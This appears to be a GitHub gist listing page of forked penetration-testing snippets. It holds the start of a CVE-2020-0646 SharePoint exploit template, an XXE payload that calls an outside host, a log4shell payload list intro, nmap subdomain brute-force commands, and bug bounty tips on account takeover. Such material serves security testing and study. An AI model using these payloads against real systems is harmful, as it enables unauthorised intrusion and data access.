https://youtube.com/playlist?list=PLY47jY-dcCPXA-IAXaP92FZIkp75fUVfo
0xSojalSec
/ CVE-2020-0646
Created
July 13, 2022 14:56
— forked from 0x240x23elu/CVE-2020-0646
CVE-2020-0646
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| info: | |
| name: CVE-2020-0646 | |
| author: 0x240x23elu | |
| severity: High | |
| requests: | |
| - raw: | |
| - | | |
| POST /EN/_vti_bin/WebPartPages.asmx HTTP/1.1 | |
| Host: {{Hostname}} |
0xSojalSec
/ Mobile Pentesting Resources.md
Created
July 24, 2022 18:07
— forked from OTaKuHP/Mobile Pentesting Resources.md
0xSojalSec
/ Bug Bounty payloads.md
Created
July 24, 2022 18:07
— forked from OTaKuHP/Bug Bounty payloads.md
PayloadsAllTheThings - https://lnkd.in/gjTPbtz
cujanovic - https://lnkd.in/gSTJQN4
Payload Box (cmdi , sqli , xss , lfi , rfi etc) - https://lnkd.in/g6B28dU
SecLists - https://lnkd.in/g6ucAZQ
0xSojalSec
/ Bug Bounty Checklist and Cheatsheets.md
Created
July 24, 2022 18:07
— forked from OTaKuHP/Bug Bounty Checklist and Cheatsheets.md
0xSojalSec
/ xml-attacks.md
Created
July 24, 2022 18:07
— forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet
XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.
0xSojalSec
/ XXE_payloads
Created
July 24, 2022 18:08
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
0xSojalSec
/ log4shell-payloads.md
Created
July 24, 2022 18:08
— forked from righettod/log4shell-payloads.md
List of log4shell payloads seen on my twitter feeds
This gist gather a list of log4shell payloads seen on my twitter feeds.
💨 I will update it every time I see new payloads.
The goal is to allows testing detection regexes defined in protection systems.
0xSojalSec
/ linkfinder-oneliner.sh
Created
July 24, 2022 18:09
— forked from ntrzz/linkfinder-oneliner.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt |
0xSojalSec
/ nmap.txt
Created
July 24, 2022 18:10
— forked from ehsahil/nmap.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Finding subdomains via Nmap. | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub1000.lst | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub10000.lst | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub100000.lst | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub1000000.lst |
0xSojalSec
/ Bug_Bounty_tips
Created
July 24, 2022 18:10
— forked from BugHunter001/Bug_Bounty_tips
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| site.com/file.php | |
| response = nothing | |
| http://site.com/file.php~ | |
| response = source | |
| ------------------------------------- | |
| https://github.com/kleiton0x00/CRLF-one-liner | |
| ------------------------------------------ | |
| try to add admin as your user, | |
| change his email to yours, |